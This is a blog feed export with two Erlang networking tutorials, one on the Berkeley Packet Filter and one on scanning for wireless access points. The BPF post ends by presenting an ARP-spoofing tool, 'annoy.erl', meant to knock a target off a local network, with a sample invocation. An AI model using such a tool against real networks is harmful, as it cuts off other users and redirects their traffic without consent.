tag:blogger.com,1999:blog-85778712889240933072024-02-06T21:48:24.477-05:00[ List || List <- "Incomprehension" ].about() -> [ world ! lists:reverse(N) || N <- [[97,119,107,119,97,114,100], [98,108,111,103], [105,115], [97,119,107,119,97,114,100]] ].Unknownnoreply@blogger.comBlogger35125tag:blogger.com,1999:blog-8577871288924093307.post-64491550253695929462011-04-23T21:47:00.004-04:002011-08-23T10:28:36.135-04:00BPF and Erlang<h1>An Erlang Interface to the Berkeley Packet Filter</h1>
<p>The <a href="http://developer.apple.com/library/mac/#documentation/Darwin/Reference/ManPages/man4/bpf.4.html" title="man page">man page</a> about <a href="http://en.wikipedia.org/wiki/Berkeley_Packet_Filter" title="bpf">bpf</a> says:</p>
<pre><code>The Berkeley Packet Filter provides a raw interface to data link layers
in a protocol independent fashion. All packets on the network, even
those destined for other hosts, are accessible through this mechanism.
</code></pre>
<p>On BSD systems, bpf can be used for capturing and generating raw network
frames. We can use bpf to send and receive network packets from Erlang
code in a similar way to using the <a href="http://blog.listincomprehension.com/2010/05/raw-socket-programming-in-erlang.html" title="PF_PACKET socket interface">PF_PACKET socket interface</a> on Linux.</p>
<p>All of the code presented here was run on Mac OS X (Snow
Leopard). Hopefully the code is portable to all BSD operating systems. If
it isn't, let me know in the comments or <a href="https://github.com/msantos" title="Look here for my email address">email</a> me.</p>
<h2>Pre-Requisites for Running the Code Examples</h2>
<p>For the Erlang examples below, you'll need a fairly recent version of
Erlang and a few libraries. You can download the <a href="http://www.erlang.org/download.html" title="Erlang source code">Erlang source code</a>
or check it out from github:</p>
<pre><code>git clone git://github.com/erlang/otp.git
</code></pre>
<p><a href="https://github.com/msantos/procket" title="procket">procket</a> is an <a href="http://www.erlang.org/doc/man/erl_nif.html" title="NIF">NIF</a> used to extend the Erlang runtime to make the various
system calls. You can check it out here:</p>
<pre><code>git clone git://github.com/msantos/procket.git
</code></pre>
<p>See the README, there is a bit of work involving setting up sudo to run
a helper app.</p>
<p>Finally, the examples use another small library (<a href="https://github.com/msantos/pkt" title="pkt">pkt</a>) to parse the
packets using Erlang binaries and convert packets from Erlang records
to binaries. It's available here:</p>
<pre><code>git clone git://github.com/msantos/pkt.git
</code></pre>
<p>To compile the example Erlang modules:</p>
<pre><code>erlc -I /path/to/procket/include -I /path/to/pkt/include annoy.erl
</code></pre>
<h2>The BPF C Interface</h2>
<p>The bpf character device is used to transfer raw network frames between
user space and the kernel. On Mac OS X, there are a fixed number of
available devices, each acting as a communication path for a single
process.</p>
<p>Using bpf works as follows:</p>
<ul>
<li><p>Starting from 0, open the bpf devices. If the the open() system call
returns failure (-1) and errno is set to EBUSY, try the next character
device, e.g., /dev/bpf1.</p>
<p>Typical values for errno might be:</p>
<ul>
<li>EPERM: the process does not have permission to access the character
device. Either the process can temporarily be given superuser
privileges or the permissions of the character device can be modified.</li>
</ul>
<p>Since bpf relies on the file permissions of the character device,
the act of opening the device is the only operation that requires
privileges. Other operations on the file descriptor do not require
any special privileges.</p>
<ul>
<li>ENOENT: the bpf device does not exist</li>
</ul></li>
<li><p>The open() call returns a file descriptor.</p></li>
<li><p>ioctl() is used to associate the bpf device with an interface</p></li>
<li><p>ioctl() is used to retrieve the bpf buffer length</p>
<p>The bpf device maintains a fixed buffer size. For efficiency, reads
performed on the bpf device will block until either the buffer is
full or a timeout is reached (by default, infinity). As a consequence,
several packets may be returned by a single read.</p></li>
<li><p>Set some optional attributes that affects the behaviour of the bpf
device.</p>
<p>For example:</p>
<ul>
<li><p>BIOCSHDRCMPLT: by default, the bpf device will construct a valid
packet header for the underlying datalink type. Setting the
"header complete" attribute allows the user to set the packet
headers themselves.</p></li>
<li><p>BIOCSEESENT: the bpf device does not return packets sent from the
host. This ioctl request can be used to change that behaviour.</p></li>
<li><p>BIOCIMMEDIATE: causes reads to immediately return after a packet is
returned rather than buffering the packets</p></li>
</ul></li>
<li><p>Apply filtering rules using BPF bytecode.</p>
<p>bpf supports a set of instructions that allow the user to restrict
which packets are returned by the device.</p></li>
</ul>
<p>See this <a href="http://bastian.rieck.ru/howtos/bpf/" title="bpf howto">tutorial</a> for a clear, concise example of capturing packets in C.</p>
<p>I've also put together some simple, runnable code. To compile it:</p>
<pre><code>gcc -g -Wall -o bpf bpf.c
</code></pre>
<script src="https://gist.github.com/939154.js?file=bpf.c"></script>
<p>To keep the example from becoming too huge, not much is done except
printing out the ethernet header. We'll cover more interesting ways of
using bpf later.</p>
<h2>The Erlang BPF Interface</h2>
<p>To use bpf within Erlang, we'll need to be able to open the bpf device,
perform the appropriate ioctl() operations, generate BPF filtering code
and read and write from the device.</p>
<h3>Opening the BPF Device</h3>
<p>procket uses a setuid helper executable to open the bpf character device
and pass the file descriptor back to Erlang:</p>
<pre><code>{ok, Socket} = procket:dev("bpf").
</code></pre>
<p>Or using the bpf module:</p>
<pre><code>{ok, Socket, Length} = bpf:open("en1").
</code></pre>
<h3>Controlling the BPF Device</h3>
<p>Once we have the file descriptor, we can set the device attributes by
using the procket:ioctl/3 NIF.</p>
<p>The bpf header file defines a number of macros for calculating the
correct ioctl request. Porting these macros to Erlang is straightforward.</p>
<p>According the to the man page on Mac OS X, the ioctl signature is
defined as:</p>
<pre><code>int ioctl(int fildes, unsigned long request, ...);
</code></pre>
<p>An ioctl request is an unsigned long, so the size of the command will
either be 4 or 8 bytes, depending on whether the platform is 32 or 64-bit.
However, the ioctl macros compute the request with the assumption that
the command is a word (or 4 bytes): the lower half of the word holds
the command and the top half has the length and the direction of the
command.</p>
<p>(The number after the colon represents the number of bits in the field.)</p>
<ol class="Message">
<li class="Message">Copy argument into kernel:1
<li class="Message">Copy argument from kernel:1
<li class="Message">No arguments:1
<li class="Message">Parameter length:13
<li class="Message">Command group:8
<li class="Message">Command:8
</ol>
<p>The fields in order are:</p>
<ul>
<li><p>IN: if set, the argument (the 3rd argument to ioctl) is read from the
user space buffer</p></li>
<li><p>OUT: if set, the argument is written to the user space buffer</p></li>
</ul>
<p>A command that is IN/OUT will have the contents of the buffer read by
the kernel and written back.</p>
<ul>
<li><p>VOID: no arguments are required by the ioctl request</p></li>
<li><p>Length: the size of the command in bytes</p></li>
<li><p>Group: the command group acts as namespace for organizing the ioctl requests</p></li>
<li><p>Command: 1 byte is reserved for the actual command</p></li>
</ul>
<p>For example, the BIOCSHDRCMPLT macro in C is:</p>
<pre><code>#define IOCPARM_MASK 0x1fff /* parameter length, at most 13 bits */
#define _IOC(inout,group,num,len) \
(inout | ((len & IOCPARM_MASK) << 16) | ((group) << 8) | (num))
#define IOC_IN (__uint32_t)0x80000000
#define _IOW(g,n,t) _IOC(IOC_IN, (g), (n), sizeof(t))
#define BIOCSHDRCMPLT _IOW('B',117, u_int)
</code></pre>
<p>The corresponding macro defined in Erlang:</p>
<pre><code>-define(SIZEOF_U_INT, 4).
-define(IOCPARM_MASK, 16#1fff).
-define(IOC_INOUT, ?IOC_IN bor ?IOC_OUT).
-define(BIOCSHDRCMPLT, bpf:iow($B, 117, ?SIZEOF_U_INT)).
ioc(Inout, Group, Num, Len) ->
Inout bor ((Len band ?IOCPARM_MASK) bsl 16) bor (Group bsl 8) bor Num.
iow(G,N,T) ->
ioc(?IOC_IN, G, N, T).
</code></pre>
<p>To set the "header complete" mode from within Erlang:</p>
<pre><code>procket:ioctl(Socket, ?BIOCSHDRCMPLT, <<1:32/native>>).
</code></pre>
<p>Or using the bpf module:</p>
<pre><code>bpf:ctl(Sockt, hdrcmplt, true).
</code></pre>
<h3>BPF Filtering</h3>
<p>bpf has a bytecode language to filter out unwanted packets. The bytecode
is generated by a set of macros in the bpf header file. For convenience
in porting examples to Erlang, I defined macros wrapping the Erlang
functions.</p>
<p>A BPF filtering program consists of an 8 byte instruction:</p>
<pre><code>struct bpf_insn {
u_short code;
u_char jt;
u_char jf;
bpf_u_int32 k;
};
</code></pre>
<ul>
<li>code: 2 bytes</li>
</ul>
<p>The opcodes are a set of instructions for moving within the packet,
testing values and control flow. The opcodes are OR'ed together.</p>
<ul>
<li>jt: 1 byte</li>
</ul>
<p><em>jump true</em>: if the operation evaluates as true (non-0), jump this many
instructions. Instructions are numbered from 0 (the statement following
the test is instruction 0).</p>
<ul>
<li>jf: 1 byte</li>
</ul>
<p><em>jump false</em>: if the operation evaluates as false (0), jump this many
instructions. Instructions use a 0 offset, starting with the following
instruction.</p>
<ul>
<li>k: 4 bytes (the man page incorrectly defines this field as a u_long)</li>
</ul>
<p>A value whose usage depends on the opcode.</p>
<h4>An Example in C</h4>
<p>I'll illustrate how the filters work by using an example from the man
page. This example filters out all packets except reverse proxy requests:</p>
<pre><code>struct bpf_insn insns[] = {
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_REVARP, 0, 3),
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 20),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, REVARP_REQUEST, 0, 1),
BPF_STMT(BPF_RET+BPF_K, sizeof(struct ether_arp) +
sizeof(struct ether_header)),
BPF_STMT(BPF_RET+BPF_K, 0),
};
</code></pre>
<ul>
<li><p>BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12)</p>
<p>The BPF_STMT macro takes an opcode and a k value as arguments.</p>
<ul>
<li><p>BPF_LD: load value (move to offset)</p></li>
<li><p>BPF_H: load a half word value (2 bytes)</p></li>
<li><p>BPF_ABS: use an absolute offset from the beginning of the packet</p></li>
<li><p>12: move 12 bytes into the ethernet frame</p></li>
</ul>
<p>An ethernet frame looks like (the numbers are bytes):</p>
<ol class="Message">
<li class="Message">Destination MAC Address:6
<li class="Message">Source MAC Address:6
<li class="Message">Type:2
</ol>
<p>A 12 byte offset leaves the program at the ethernet type.</p></li>
<li><p>BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_REVARP, 0, 3)</p>
<p>The BPF_JUMP macro arguments are: opcode, k, jt, jf</p>
<ul>
<li><p>BPF_JMP: A branching operation, depending on whether the test evaluates
as true or not</p></li>
<li><p>BPF_JEQ: the equality of the value at this offset (defined in the previous
instruction as a half-word) is tested against the value held in the k field.</p>
<p>If the value is equal to ETHERTYPE_REVARP (0x8035), the packet is
a reverse ARP packet and control drops to the next statement. If
the statement is false (for example, it is an IP packet), control
jumps to the final statement:</p>
<pre><code>BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_REVARP, 0, 3),
0: BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 20),
1: BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, REVARP_REQUEST, 0, 1),
2: BPF_STMT(BPF_RET+BPF_K, sizeof(struct ether_arp) +
sizeof(struct ether_header)),
3: BPF_STMT(BPF_RET+BPF_K, 0),
</code></pre></li>
</ul></li>
<li><p>BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 20)</p></li>
</ul>
<p>The packet is a reverse arp packet. Move to offset 20. A reverse ARP
packet looks like (numbers are bytes):</p>
<ol class="Message">
<li class="Message">Hardware Type:2
<li class="Message">Protocol Type:2
<li class="Message">Hardware Length:1
<li class="Message">Protocol Length:1
<li class="Message">Operation:2
<li class="Message">Sending Hardware Address:6
<li class="Message">Sending IP Address:4
<li class="Message">Target Hardware Address:6
<li class="Message">Target IP Address:4
</ol>
<p>An offset of 20 (ethernet frame = 14, so 6 bytes into the ARP packet)
puts the program at the ARP operation, a 2 byte (half-word) field.</p>
<ul>
<li>BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, REVARP_REQUEST, 0, 1)</li>
</ul>
<p>If the value of the offset is equal to REVARP_REQUEST (3) move to the
next instruction.</p>
<p>Otherwise, jump 1 instruction to the final return statement:</p>
<pre><code> BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, REVARP_REQUEST, 0, 1),
0: BPF_STMT(BPF_RET+BPF_K, sizeof(struct ether_arp) +
sizeof(struct ether_header)),
1: BPF_STMT(BPF_RET+BPF_K, 0),
</code></pre>
<ul>
<li>BPF_STMT(BPF_RET+BPF_K, sizeof(struct ether_arp) + sizeof(struct ether_header))</li>
</ul>
<p>BPF_RET: return the value in the k field. "k" number of bytes of the
packet will be returned to the bpf device.</p>
<ul>
<li>BPF_STMT(BPF_RET+BPF_K, 0)</li>
</ul>
<p>0 bytes is returned to the bpf device. The packet is dropped.</p>
<h4>An Example in Erlang</h4>
<p>Here is another example from the bpf man page: sniffing finger
requests. Yes, the bpf man page appears to have been written in a long
ago age, when reverse ARP and finger requests roamed the networks.</p>
<p>First the C version:</p>
<pre><code>struct bpf_insn insns[] = {
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, ETHERTYPE_IP, 0, 10),
BPF_STMT(BPF_LD+BPF_B+BPF_ABS, 23),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, IPPROTO_TCP, 0, 8),
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 20),
BPF_JUMP(BPF_JMP+BPF_JSET+BPF_K, 0x1fff, 6, 0),
BPF_STMT(BPF_LDX+BPF_B+BPF_MSH, 14),
BPF_STMT(BPF_LD+BPF_H+BPF_IND, 14),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 79, 2, 0),
BPF_STMT(BPF_LD+BPF_H+BPF_IND, 16),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 79, 0, 1),
BPF_STMT(BPF_RET+BPF_K, (u_int)-1),
BPF_STMT(BPF_RET+BPF_K, 0),
};
</code></pre>
<p>Now the Erlang version (with comments):</p>
<pre><code>-include("bpf.hrl").
-define(ETHERTYPE_IP, 16#0800).
-define(IPPROTO_TCP, 6).
finger() ->
[
% Ethernet
?BPF_STMT(?BPF_LD+?BPF_H+?BPF_ABS, 12), % offset = Ethernet Type
?BPF_JUMP(?BPF_JMP+?BPF_JEQ+?BPF_K, ?ETHERTYPE_IP, 0, 10), % type = IP
% IP
?BPF_STMT(?BPF_LD+?BPF_B+?BPF_ABS, 23), % offset = ip protocol
?BPF_JUMP(?BPF_JMP+?BPF_JEQ+?BPF_K, ?IPPROTO_TCP, 0, 8), % protocol = TCP
?BPF_STMT(?BPF_LD+?BPF_H+?BPF_ABS, 20), % offset = flags, frag offset
?BPF_JUMP(?BPF_JMP+?BPF_JSET+?BPF_K, 16#1fff, 6, 0), % frag offset: mask the top 3 bits
% and AND with 1's
% If any non-0 value is returned from the
% AND (i.e., frag offset is non-0), jump
% to the end and drop the packet
?BPF_STMT(?BPF_LDX+?BPF_B+?BPF_MSH, 14), % offset = IP version, IP header length
% Load the header length into the index
% register
% TCP
?BPF_STMT(?BPF_LD+?BPF_H+?BPF_IND, 14), % offset = TCP source port
% Move from offset 14 (start of IP packet)
% plus the value held in the index register
% (IP header length). Puts us at the start
% of the TCP packet (at the source port)
?BPF_JUMP(?BPF_JMP+?BPF_JEQ+?BPF_K, 79, 2, 0), % source port = 79
?BPF_STMT(?BPF_LD+?BPF_H+?BPF_IND, 16), % offset = destination port
?BPF_JUMP(?BPF_JMP+?BPF_JEQ+?BPF_K, 79, 0, 1), % destination port = 79
?BPF_STMT(?BPF_RET+?BPF_K, 16#FFFFFFFF), % return: entire packet
?BPF_STMT(?BPF_RET+?BPF_K, 0) % return: drop packet
].
</code></pre>
<p>Note that this filter does not check if the packet is IPv4.</p>
<h4>Loading the Filter</h4>
<p>To load the filter, another ioctl (BIOCSETF) is called. The ioctl takes
a structure with a length and a pointer to the instructions:</p>
<pre><code>struct bpf_program {
u_int bf_len;
struct bpf_insn *bf_insns;
};
</code></pre>
<p>The length field is set to the number of instructions, not the size
of the instructions. In the first example (the reverse ARP filter),
the length is 6.</p>
<p>In Erlang, the filter is loaded using:</p>
<pre><code>Insn = finger(),
{ok, Code, [Res]} = procket:alloc([
<<(length(Insn)):4/native-unsigned-integer-unit:8>>,
{ptr, list_to_binary(Insn)}
]),
case procket:ioctl(Socket, ?BIOCSETF, Code) of
{ok, _} ->
procket:buf(Res);
Error ->
Error
end.
</code></pre>
<p>Or, more simply, using the bpf module:</p>
<pre><code>bpf:ctl(Socket, setf, finger()).
</code></pre>
<h1>BPF Filter Examples</h1>
<script src="https://gist.github.com/939183.js?file=filt.erl"></script>
<h1>BPF Packet Capture</h1>
<p>Capturing packets is as simple as reading from the bpf device.</p>
<p>To work with file descriptors, procket needs to support the
read and write system calls.</p>
<pre><code>{ok, Buf} = procket:read(FD, Length).
</code></pre>
<p>The captured packet is not an ethernet frame (or a frame of whatever
datalink type you happen to be sniffing): it's a buffer prepended with
a header containing information about the packet that follows.</p>
<pre><code>struct bpf_hdr {
struct timeval bh_tstamp; /* time stamp */
u_long bh_caplen; /* length of captured portion */
u_long bh_datalen; /* original length of packet */
u_short bh_hdrlen; /* length of bpf header (this struct
plus alignment padding */
};
</code></pre>
<ul>
<li><p>bh_timestamp differs between 32 and 64-bit platforms</p>
<ul>
<li><p>On a 32-bit platform, struct timeval has a 4 byte sec and usec field.</p></li>
<li><p>On a 64-bit platform, struct timeval has an 8 byte sec and a 4
byte usec field.</p></li>
</ul></li>
<li><p>bh_caplen is the size of the captured packet that follows</p></li>
<li><p>bh_datalen is the real packet length. The packet may have been truncated.</p></li>
<li><p>bh_hdrlen is the real size of the bpf_hdr structure which may be
padded due to alignment</p></li>
</ul>
<p>To determine the start of the next packet, the bpf header provides a
macro. Similarly the Erlang bpf module provides a module to calculate
the proper offset:</p>
<pre><code>?BPF_WORDALIGN(Hdrlen + Caplen).
</code></pre>
<p>The bpf module will do the calculations for you:</p>
<pre><code>{ok, Length} = bpf:ctl(Socket, blen),
{ok, Buf} = procket:read(Socket, Length),
{bpf_buf, Time, Datalen, Packet, Rest} = bpf:buf(Socket).
</code></pre>
<p>Here is a complete example of using the bpf module to dump packets. It
can be used with the filt module, if you want to play with the fcode
filtering. To start it:</p>
<pre><code>% en1 is the wireless device
% rule = ( src host 10.10.10.10 or dst host 10.10.10.10 ) and ( src port 80 or dst port 80)
dump:start("en1", filt:tcp({10,10,10,10}, 80)).
</code></pre>
<script src="https://gist.github.com/939215.js?file=dump.erl"></script>
<h1>BPF Packet Generation</h1>
<p>Generating crafted packets is even simpler: write the packet to the bpf
device. The packet must be valid.</p>
<p>Be careful, crafted packets can have strange effects. On Mac OS X, I found
a few odd cases that caused the network interface to go down. For example,
sending out ARP replies from a spoofed MAC address or even advertising
0.0.0.0 with the macbook's MAC address.</p>
<p>This example acts as a sort of peer to peer QoS, should you ever need to
kick someone off of a local network. This code acts in 2 ways:</p>
<ul>
<li><p>It continually arps for whatever IP the target advertises. Eventually,
the target system will give up and go offline.</p></li>
<li><p>Since gratuious arps are sent aggressively, the gateway will consider
our MAC address to be the MAC address for the target's IP address and
will send packets to us, effectively cutting off the target system.</p></li>
</ul>
<p>To use the code, you will need to know the target's MAC and IP address.</p>
<pre><code>% our interface: en1
% target:
% MAC = "00:aa:bb:cc:dd:ee"
% IP = "10.10.10.10"
annoy:er("en1", "00:aa:bb:cc:dd:ee", "10.10.10.10").
</code></pre>
<script src="https://gist.github.com/939168.js?file=annoy.erl"></script>Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8577871288924093307.post-58059766473448935232011-03-07T19:51:00.013-05:002011-09-22T20:27:26.185-04:00Wireless Scanning with Erlang<h1>
Scanning for Wireless Access Points with Erlang</h1>
<p>
The Linux wireless LAN network interface (802.11) uses a socket/ioctl
interface to communicate with the kernel. I am going to go over building
an Erlang interface for initiating scanning and retrieving the scan
results.</p>
<p>
All of this code was run on Ubuntu 10.04 using constants defined in wireless.22.h
of the <a href="http://www.hpl.hp.com/personal/Jean_Tourrilhes/Linux/Tools.html">wireless tools for Linux</a>.</p>
<h2>
The Scanning Process</h2>
<p>
The scan process works as follows:</p>
<ol>
<li><p>
Open a datagram socket</p>
</li>
<li><p>
Allocate a iwreq structure. The structure contains the device name
used for scanning and a pointer to an optional user allocated buffer
containing an ESSID. According to the man page, specifying an ESSID with
some drivers allows hidden networks to be found.</p>
</li>
<li><p>
Call an ioctl on the socket with the request set to SIOCSIWSCAN (0x8B18).</p>
</li>
<li><p>
Allocate another iwreq structure containing a pointer to a user
allocated buffer with enough space to hold the response.</p>
</li>
<li><p>
Call a second ioctl on the socket with the request set to SIOCGIWSCAN (0x8B19)</p>
</li>
<li><p>
When the ioctl returns successfully, both the iwreq structure and the
user allocated buffer are updated. The iwreq structure contains the actual
size of the data held in the buffer and the buffer holds the set of events.</p>
</li>
</ol>
<p>
<ul class="Message">
<li class="Message">length:2 bytes</li>
<li class="Message">command:2 bytes</li>
<li class="Message">data:(length-4)</li>
</ul>
<p>
Examples of data types are the ESSID, BSSID, channel, etc.</p>
<h3>
The iwreq Structure</h3>
<p>
The iwreq structure is composed of 2 unions:</p>
<pre><code>#define IFNAMSIZ 16
struct iwreq
{
union
{
char ifrn_name[IFNAMSIZ]; /* if name, e.g. "eth0" */
} ifr_ifrn;
/* Data part (defined just above) */
union iwreq_data u;
};
</code></pre>
<p>
The iwreq_data union is constrained to 32 bytes and composed of the following:</p>
<pre><code>union iwreq_data
{
/* Config - generic */
char name[IFNAMSIZ];
/* Name : used to verify the presence of wireless extensions.
* Name of the protocol/provider... */
struct iw_point essid; /* Extended network name */
struct iw_param nwid; /* network id (or domain - the cell) */
struct iw_freq freq; /* frequency or channel :
* 0-1000 = channel
* > 1000 = frequency in Hz */
struct iw_param sens; /* signal level threshold */
struct iw_param bitrate; /* default bit rate */
struct iw_param txpower; /* default transmit power */
struct iw_param rts; /* RTS threshold threshold */
struct iw_param frag; /* Fragmentation threshold */
__u32 mode; /* Operation mode */
struct iw_param retry; /* Retry limits & lifetime */
struct iw_point encoding; /* Encoding stuff : tokens */
struct iw_param power; /* PM duration/timeout */
struct iw_quality qual; /* Quality part of statistics */
struct sockaddr ap_addr; /* Access point address */
struct sockaddr addr; /* Destination address (hw/mac) */
struct iw_param param; /* Other small parameters */
struct iw_point data; /* Other large parameters */
};
</code></pre>
<p>
Some of the data may be larger than can be held in the union. The iw_point structure, for example, contains a pointer to user allocated memory that can be used to hold either arguments to be read by the kernel or data returned by the kernel.</p>
<p>
The iw_point structure looks like:</p>
<pre><code>struct iw_point
{
void __user *pointer; /* Pointer to the data (in user space) */
__u16 length; /* number of fields or size in bytes */
__u16 flags; /* Optional params */
};
</code></pre>
<h3>
The SIOCSIWSCAN ioctl</h3>
<p>
To initiate the scan, we call an ioctl on a socket file descriptor. Any socket type can be used. The structure we pass to ioctl contains the interface name. For example, to scan using the default ESSID:</p>
<pre><code>struct iwreq iwr = {0};
(void)memcpy(iwr.ifr_ifrn.ifrn_name, "wlan0", IFNAMSIZ);
iwr.u.data.pointer = NULL;
iwr.u.data.length = 0;
iwr.u.data.flags = 0;
</code></pre>
<p>
To scan a specific ESSID without disassociating from the current AP:</p>
<pre><code>#define IW_SCAN_THIS_ESSID 16#0002
struct iwreq iwr = {0};
char *essid = NULL;
(void)memcpy(iwr.ifr_ifrn.ifrn_name, "wlan0", IFNAMSIZ);
essid = strdup("linksys");
if (essid == NULL)
err(EXIT_FAILURE, "strdup");
iwr.u.data.pointer = essid;
iwr.u.data.length = strlen(essid)+1;
iwr.u.data.flags |= IW_SCAN_THIS_ESSID;
</code></pre>
<p>
The ioctl is called using the iwreq structure and indicates an error by a non-zero return value, with the reason held in errno.</p>
<pre><code>ioctl(socket, SIOCSIWSCAN, &iwr);
</code></pre>
<p>
The iwreq structure is not modified upon return (or at least, we do not care if has changed).</p>
<p>
Common errors are:</p>
<ul>
<li><p>
EAGAIN: the scan has not completed. We will need to wait and poll the
socket after a period of time has passed.</p>
</li>
<li><p>
EBUSY: another scan is currently in progress. Again, we will need to
sleep and poll the socket later.</p>
</li>
<li><p>
ENOTSUP: the requested device is not a wireless device</p>
</li>
</ul>
<h3>
The SIOCGIWSCAN ioctl</h3>
<p>
To retrieve the results of the last scan, we issue another ioctl with the request set to SIOCGIWSCAN. The iwreq structure must point to a buffer large enough to hold the response (the list of APs).</p>
<pre><code>#define BUFSZ 4096
struct iwreq iwr = {0};
char *p = NULL;
(void)memcpy(iwr.ifr_ifrn.ifrn_name, "wlan0", IFNAMSIZ);
p = calloc(BUFSZ,1);
if (p == NULL)
err(EXIT_FAILURE, "calloc");
iwr.u.data.pointer = p;
iwr.u.data.length = BUFSZ;
iwr.u.data.flags = 0;
</code></pre>
<p>
After the ioctl returns (it may fail for the same reasons as above):</p>
<ul>
<li>the iwreq structure will be updated to hold the actual size of the data in our buffer</li>
<li>our buffer will hold the scan list</li>
</ul>
<h2>
An Erlang Approach to Pointers and ioctl()'s: Resources</h2>
<p>
To make system calls that aren't supported by the Erlang VM, we will need to integrate a small amount of C code using Erlang's NIF interface. The <a href="https://github.com/msantos/procket" title="procket">procket</a> library on GitHub was made to perform some low level operations on sockets. I've added some additional functions to deal with versions of ioctl() using input/output fields containing pointers to memory:</p>
<pre><code>procket:alloc/1
procket:buf/1
</code></pre>
<p>
It's easier to explain by giving an example:</p>
<pre><code>Len = 16,
{ok, Struct, [Resource1, Resource2]} = procket:alloc([
<<Len:2/native-unsigned-integer-unit:8>>,
{ptr, Len},
<<Flags:2/native-unsigned-integer-unit:8>>,
{ptr, <<"some data">>}
]).
</code></pre>
<p>
Where:</p>
<ul>
<li>Struct: a binary that can be passed to procket:ioctl/3</li>
</ul>
<p>
This binary contains the actual pointer and so should be considered to be read-only. Modifying the binary could result in the VM crashing.</p>
<ul>
<li>Resource1, Resource2: NIF resources</li>
</ul>
<p>
The first resource points to a zero'ed 16 byte buffer.</p>
<p>
The second resource points to a 9 byte buffer initialized with the string "some data".</p>
<p>
procket:buf/1 is used to retrieve the contents of the buffer. Here is a complete example: retrieving the list of network interfaces (usually you would just use inet:getifaddrs/0).</p>
<pre><code>-module(ifconf).
-export([dev/0]).
%% Get the list of network interfaces similar to
%% inet:getifaddrs/0
-define(SIOCGIFCONF, 16#00008912).
% struct ifconf
% {
% int ifc_len; /* size of buffer */
% union
% {
% char *ifcu_buf;
% struct ifreq *ifcu_req;
% } ifc_ifcu;
% };
dev() ->
Len = 8192,
{ok, Ifconf, [Res]} = procket:alloc([
<<Len:4/native-integer-unit:8>>,
{ptr, Len}
]),
{ok, Socket} = procket:socket(inet, dgram, 0),
{ok, Ifconf1} = procket:ioctl(Socket, ?SIOCGIFCONF, Ifconf),
{ok, Buf} = procket:buf(Res),
<<N:4/native-integer-unit:8, _/binary>> = Ifconf1,
Ifs = ifreq(Buf, N),
procket:close(Socket),
{ok, Ifconf, Ifconf1, Buf, Ifs}.
% struct ifreq
% {
% #define IFHWADDRLEN 6
% union
% {
% char ifrn_name[IFNAMSIZ]; /* if name, e.g. "en0" */
% } ifr_ifrn;
%
% union {
% struct sockaddr ifru_addr;
% struct sockaddr ifru_dstaddr;
% struct sockaddr ifru_broadaddr;
% struct sockaddr ifru_netmask;
% struct sockaddr ifru_hwaddr;
% short ifru_flags;
% int ifru_ivalue;
% int ifru_mtu;
% struct ifmap ifru_map;
% char ifru_slave[IFNAMSIZ]; /* Just fits the size */
% char ifru_newname[IFNAMSIZ];
% void * ifru_data;
% struct if_settings ifru_settings;
% } ifr_ifru;
% };
% struct sockaddr_in
% {
% __SOCKADDR_COMMON (sin_);
% in_port_t sin_port; /* Port number. */
% struct in_addr sin_addr; /* Internet address. */
%
% /* Pad to size of `struct sockaddr'. */
% unsigned char sin_zero[sizeof (struct sockaddr) -
% __SOCKADDR_COMMON_SIZE -
% sizeof (in_port_t) - sizeof (struct in_addr)];
% };
ifreq(Buf, N) ->
<<Buf1:N/bytes, _/binary>> = Buf,
ifreq1(Buf1, []).
ifreq1(<<>>, Ifs) ->
Ifs;
ifreq1(<<
Name:16/bytes,
_Family:16,
_Port:16,
IP1:8, IP2:8, IP3:8, IP4:8,
_:64,
Rest/binary
>>, Ifs) ->
[Dev, _] = binary:split(Name, <<0>>),
ifreq1(Rest, [{Dev, {IP1,IP2,IP3,IP4}}|Ifs]).
</code></pre>
<h2>
Running a Scan Using Erlang</h2>
<p>
So finally combining all of the above, we can begin putting the code together to do an AP scan from Erlang. For brevity, I've removed some of the error handling, etc, the <a href="https://github.com/msantos/wierl">code is available on GitHub</a>.</p>
<h3>
Privileges</h3>
<p>
To use this code, beam will either have to be running as root or (preferably) have the CAP_NET_ADMIN privilege. To set it:</p>
<pre><code>setcap cap_net_admin=ep /path/to/beam
</code></pre>
<p>
To check the privs have been set:</p>
<pre><code>getcap /path/to/beam
</code></pre>
<p>
To remove the privs after you're done playing:</p>
<pre><code>setcap -r /path/to/beam
</code></pre>
<h3>
The code</h3>
<script src="https://gist.github.com/859390.js?file=wierl.erl"></script> <h3>
Running it</h3>
<pre><code>erl -pa /path/to/procket/ebin
1> wierl:start(<<"wlan0">>).
bssid:<<1,0,0,30,74,31,75,76,0,0,0,0,0,0,0,0>>
freq:<<1,0,0,0,0,0,0,0>>
freq:<<108,9,0,0,6,0,0,0>>
qual:<<40,186,0,75>>
encode:<<0,0,0,128>>
essid:<<14,0,1,0,116,104,101,101,115,115,105,100,105,115,97,108, 105,101>>
rate:<<64,66,15,0,0,0,0,0,128,132,30,0,0,0,0,0,96,236,83,0,0,0,0,0,128,141,91,
0,0,0,0,0,64,84,137,0,0,0,0,0,192,216,167,0,0,0,0,0,0,27,183,0,0,0,0,0,
128,168,18,1,0,0,0,0>>
rate:<<0,54,110,1,0,0,0,0,0,81,37,2,0,0,0,0,0,108,220,2,0,0,0,0,128,249,55,3,0,
0,0,0>>
mode:<<3,0,0,0>>
custom:<<20,0,0,0,116,115,102,61,48,48,48,48,48,48,50,57,50,48,99,98,101,49,
102,56>>
